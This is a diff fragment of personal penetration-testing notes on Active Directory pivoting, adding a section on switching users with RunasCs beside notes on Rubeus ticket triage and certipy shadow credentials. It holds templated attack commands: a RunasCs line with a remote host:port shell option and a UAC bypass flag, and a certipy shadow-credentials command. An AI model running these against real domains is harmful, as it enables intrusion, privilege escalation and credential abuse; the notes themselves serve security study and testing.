KhaelK138/KhaelK138.github.io/markdown/ADPivoting.md

   - Dumping and using tickets is one of Rubeus's strong suits
   - `Rubeus.exe triage` to list available tickets

+**Changing Users**
+- If only one of our users can remote into the system, but we want to operate as another user, we can use [RunasCs](https://github.com/antonioCoco/RunasCs)
+- This is built on top of the base `runas.exe` and handles much better
+  - `RunasCs.exe {username} {password} {cmd} -d {domain} -r {host:port} `
+    - Also has `--bypass-uac`
+- Compiled executable in releases zip: [https://github.com/antonioCoco/RunasCs/releases/tag/v1.5](https://github.com/antonioCoco/RunasCs/releases/tag/v1.5)

 **Shadow Credentials**
 - Seems certipy is the go-to here: `certipy shadow -u "{user}@{domain}" -p {password} -dc-ip {dc_ip} -account '{target_user}' auto`
 - If we have GenericWrite over a user from a group